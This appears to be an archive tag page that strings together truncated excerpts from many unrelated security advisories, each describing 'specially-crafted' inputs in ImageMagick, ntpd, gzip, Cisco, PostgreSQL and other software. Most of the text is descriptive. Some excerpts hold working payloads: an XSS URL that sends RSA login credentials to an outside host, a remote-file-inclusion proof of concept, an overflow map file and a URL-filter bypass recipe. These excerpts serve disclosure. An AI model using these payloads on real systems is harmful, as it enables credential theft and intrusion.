
specially/crafted

VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components

   this advisory.

   A buffer overflow flaw was discovered in the ntpd daemon's NTPv4
   authentication code. If ntpd was configured to use public key
   cryptography for NTP packet authentication, a remote attacker could
   use this flaw to send a specially-crafted request packet that could
   crash ntpd or, potentially, execute arbitrary code with the
   privileges of the "ntp" user.

   The Common Vulnerabilities and Exposures Project (cve.mitre.org)
   has assigned the name CVE-2009-1252 to this issue.

[ MDVSA-2012:077 ] imagemagick

 local users to gain privileges via a Trojan horse configuration file
 in the current working directory (CVE-2010-4167).
 
 A flaw was found in the way ImageMagick processed images with malformed
 Exchangeable image file format (Exif) metadata. An attacker could
 create a specially-crafted image file that, when opened by a victim,
 would cause ImageMagick to crash or, potentially, execute arbitrary
 code (CVE-2012-0247).
 
 A denial of service flaw was found in the way ImageMagick processed
 images with malformed Exif metadata. An attacker could create a

[ MDVSA-2012:078 ] imagemagick

 Multiple vulnerabilities have been found and corrected in imagemagick:
 
 A flaw was found in the way ImageMagick processed images with malformed
 Exchangeable image file format (Exif) metadata. An attacker could
 create a specially-crafted image file that, when opened by a victim,
 would cause ImageMagick to crash or, potentially, execute arbitrary
 code (CVE-2012-0247).
 
 A denial of service flaw was found in the way ImageMagick processed
 images with malformed Exif metadata. An attacker could create a

iDefense Security Advisory 02.08.11: Microsoft Windows Picture and Fax Viewer Library

III. ANALYSIS

Exploitation could allow attackers to execute arbitrary code on the
targeted host under the privileges of the current logged-on user.
Successful exploitation would require the attacker to entice his or her
victim into viewing a specially-crafted thumbnail leveraging the
vulnerability.

Some vectors of attack include e-mail, the browser and network shares.
In an e-mail-based attack, the attacker must entice his or her victim
into opening or previewing a specially-crafted Office document
containing a specially-crafted thumbnail. In a browser-based attack,
the victim must simply view a

PR07-44: XSS on RSA Authentication Agent login page

The injected payload in the previous examples is:
"><script>alert("XSS")</script><a b="

The following specially-crafted URL performs an advanced XSS phishing
attack. After the victim enters his/her username and passcode, the
credentials are forwarded to a third-party site (procheckup.com in this
case) and logged by the attacker:

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22&authntype=2&username=anyvaluehere&passcode=anyvaluehere

PR10-06: Cross-domain redirect on PGP Universal Web Messenger

Messenger. This issue is due to a failure of the application to properly
sanitize URI-supplied data assigned to the 'retryURL' parameter.

An attacker may leverage this issue to carry out convincing phishing
attacks against unsuspecting users by causing an arbitrary page to be
loaded once a specially-crafted PGP Universal Web Messenger URL is visited.

Vulnerable server-side script: '/b/lnj.e?'

Unfiltered parameter: 'retryURL'
Proof of concept

PR07-43: Cross-domain redirect on RSA Authentication Agent

Agent. This issue is due to a failure of the application to properly
sanitize URI-supplied data assigned to the 'url' parameter.

An attacker may leverage this issue to carry out convincing phishing
attacks against unsuspecting users by causing an arbitrary page to be
loaded once a specially-crafted RSA Authentication Agent URL is visited.

Although the 'url' parameter is filtered for protocol URLs such as
'http://' and 'https://', it is NOT filtered for other protocols such as
FTP or Gopher. An attacker could upload a spoof login page to an FTP
server that allows anonymous connections where the victim would be

[ MDVSA-2010:020 ] gzip

 Multiple vulnerabilities have been found and corrected in gzip:
 
 A missing input sanitization flaw was found in the way gzip used to
 decompress data blocks for dynamic Huffman codes. A remote attacker
 could provide a specially-crafted gzip compressed data archive,
 which once opened by a local, unsuspecting user would lead to denial
 of service (gzip crash) or, potentially, to arbitrary code execution
 with the privileges of the user running gzip (CVE-2009-2624).
 
 An integer underflow leading to an array index error was found in the

[ MDVSA-2008:099 ] - Updated ImageMagick packages fix vulnerabilities

 _______________________________________________________________________
 
 Problem Description:
 
 A heap-based buffer overflow vulnerability was found in how ImageMagick
 parsed XCF files.  If ImageMagick opened a specially-crafted XCF
 file, it could be made to overwrite heap memory beyond the bounds
 of its allocated memory, potentially allowing an attacker to execute
 arbitrary code on the system running ImageMagick (CVE-2008-1096).
 
 Another heap-based buffer overflow vulnerability was found in how

VMSA-2010-0004 ESX Service Console and vMA third party updates

    widgets, checkboxes, radio buttons, labels, plain text fields,
    scrollbars, etc., to text mode user interfaces.

    A heap-based buffer overflow flaw was found in the way newt
    processes content that is to be displayed in a text dialog box.
    A local attacker could issue a specially-crafted text dialog box
    display request (direct or via a custom application), leading to a
    denial of service (application crash) or, potentially, arbitrary
    code execution with the privileges of the user running the
    application using the newt library.


[ MDVSA-2012:051 ] libvorbis

 Problem Description:

 Multiple vulnerabilities have been found and corrected in libvorbis:
 
 A specially-crafted Ogg Vorbis media format file (Ogg) could cause an
 application using libvorbis to crash or, possibly, execute arbitrary
 code when opened (CVE-2009-3379).
 
 If a specially-crafted Ogg Vorbis media file was opened by an
 application using libvorbis, it could cause the application to crash

FortiGuard: URL Filtering Application Bypass Vulnerability

It is based on code developed by sinhack research labs:
http://sinhack.net/URLFilteringEvasion/sakeru.tx

Description:
"Fortinet's URL blocking functionality can be bypassed by
specially-crafted HTTP requests that fulfill 3 factors:

1.- HTTP requests are terminated by the CRLF characters.
2.- Forcing the client to talk HTTP/1.0 so that the Host header is not sent.
3.- Finally, by fragmenting the GET or POST requests


[USN-901-1] Squid vulnerabilities

necessary changes.

Details follow:

It was discovered that Squid incorrectly handled certain auth headers. A
remote attacker could exploit this with a specially-crafted auth header
and cause Squid to go into an infinite loop, resulting in a denial of
service. This issue only affected Ubuntu 8.10, 9.04 and 9.10.
(CVE-2009-2855)

It was discovered that Squid incorrectly handled certain DNS packets. A

Positron Security Advisory #2009-000: Multiple Vulnerabilities in MapServer v5.2.1 and v4.10.3

map file.  The third variable, "mapserv->Id", is read from user input
at line 406, though it is restricted to IDSIZE (128) bytes.  Thus, a
buffer overflow can be achieved by creating a map file on the server
with overly long IMAGEPATH and/or NAME attributes; their values will be
stored past the end of "buffer" and will overwrite saved register
values.  If the following specially-crafted map file ("bof.map") is
stored on the server (either by creating it directly, or tricking a
legitimate user into placing it onto the file system):

    MAP
      NAME {"A" x 1072}GGGG

CORE-2011-0106: Microsoft Publisher 2007 Pubconv.dll Memory Corruption

3. *Vulnerability Description*

Microsoft Publisher is a desktop publishing application from Microsoft
that uses a proprietary file format (.pub). A vulnerability has been
found in Publisher 2007, that can be leveraged by an attacker to
execute arbitrary code by enticing users to insert a specially-crafted
.pub file into a document.


4. *Vulnerable packages*


[SWRX-2010-001] Cisco ASA HTTP Response Splitting Vulnerability

Release mode: Coordinated release
Discovered by: Daniel King, SecureWorks


Summary
Cisco Adaptive Security Appliance (ASA) is vulnerable to HTTP response splitting caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim’s web browser within the security context of the Adaptive Security Appliance site.


Affected Products
Cisco ASA version 8.1(1) and earlier.


FLEA-2007-0066-1 ImageMagick

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988

Description:
    Previous versions of the ImageMagick package are vulnerable to multiple
    attacks whereby an attacker might be able to execute arbitrary code by
    coercing the user into opening specially-crafted files with ImageMagick.

---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.

[SECURITY] [DSA-1964-1] New PostgreSQL packages fix several vulnerabilities

(optional) TLS protection on client-server connections, by relying on
a certificate from a trusted CA which contains an embedded NUL byte in
the Common Name (CVE-2009-4034).

Authenticated database users could elevate their privileges by
creating specially-crafted index functions (CVE-2009-4136).

The following table shows fixed source package versions for the
respective distributions.

                   oldstable/etch  stable/lenny    testing/unstable

[ MDVSA-2010:149 ] freetype2

 A vulnerability has been discovered and corrected in freetype2:
 
 Multiple stack overflow flaws have been reported in the way the FreeType
 font rendering engine processed certain CFF opcodes. An attacker
 could use these flaws to create a specially-crafted font file that,
 when opened, would cause an application linked against libfreetype
 to crash or, possibly, execute arbitrary code (CVE-2010-1797).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:

Puntal (index.php) Remote File Inclusion Vulnerabilities

Puntal could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the "index.php" script using the "app_path=" or "puntal_path=" parameter to specify a malicious PHP file on a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.

Puntal 2.1.0 is vulnerable; other versions may also be affected.

An attacker can exploit these issues via a browser.

-=[P0C]=-

http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll]
            or

[ GLSA 201012-01 ] Chromium: Multiple vulnerabilities

A remote attacker could trick a user into performing a set of UI actions
that trigger a possibly exploitable crash, leading to execution of
arbitrary code or a Denial of Service.

It was also possible for an attacker to entice a user to visit a
specially-crafted web page that would trigger one of the
vulnerabilities, leading to execution of arbitrary code within the
confines of the sandbox, successful Cross-Site Scripting attacks,
violation of the same-origin policy, successful website spoofing
attacks, information leak, or a Denial of Service. An attacker could
also trick a user into performing a set of UI actions that might result in a

[ GLSA 200712-13 ] E2fsprogs: Multiple buffer overflows

from within the file system, resulting in heap-based buffer overflows.

Impact
======

An attacker could entice a user to process a specially-crafted ext2 or
ext3 file system image (with tools linking against libext2fs, e.g.
fsck, forensic tools or Xen's pygrub), possibly resulting in the
execution of arbitrary code with the privileges of the user running the
application.


[ MDVSA-2012:062 ] openoffice.org

 Problem Description:

 An XML External Entity expansion flaw was found in the way Raptor
 processed RDF files. If an application linked against Raptor were to
 open a specially-crafted RDF file, it could possibly allow a remote
 attacker to obtain a copy of an arbitrary local file that the user
 running the application had access to. A bug in the way Raptor handled
 external entities could cause that application to crash or, possibly,
 execute arbitrary code with the privileges of the user running the
 application (CVE-2012-0037).

[ MDVSA-2010:103 ] postgresql

 call to the substring function for a bit string, related to an
 overflow (CVE-2010-0442).
 
 A flaw was found in the way the PostgreSQL server process
 enforced permission checks on scripts written in PL/Perl. A remote,
 authenticated user, running a specially-crafted PL/Perl script, could
 use this flaw to bypass PL/Perl trusted mode restrictions, allowing
 them to obtain sensitive information; execute arbitrary Perl scripts;
 or cause a denial of service (remove protected, sensitive data)
 (CVE-2010-1169).
 

Cisco Security Advisory: Cisco Unified IP Phone Overflow and Denial of Service Vulnerabilities

  * DNS Response Parsing Overflow

    Cisco Unified IP Phone 7940, 7940G, 7960 and 7960G devices
    running SCCP and SIP firmware contain a buffer overflow
    vulnerability in the handling of DNS responses. A
    specially-crafted DNS response may be able to trigger a buffer
    overflow and execute arbitrary code on a vulnerable phone. This
    vulnerability is corrected in SCCP firmware version 8.0(8) and
    SIP firmware version 8.8(0). This vulnerability is documented in
    CVE-2008-0530 and Cisco Bug IDs CSCsj74818 and CSCsk21863.

[ MDVSA-2012:004 ] t1lib

 
 A heap-based buffer overflow flaw was found in the way the AFM font file
 parser, used for rendering of DVI files, in the GNOME evince document
 viewer and other products, processed line tokens from the given input
 stream. A remote attacker could provide a DVI file with an embedded
 specially-crafted font file and trick the local user into opening it with
 an application using the AFM font parser, leading to a crash of that
 particular application or, potentially, arbitrary code execution with the
 privileges of the user running the application. This is a different
 vulnerability than CVE-2010-2642 (CVE-2011-0433).
 

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.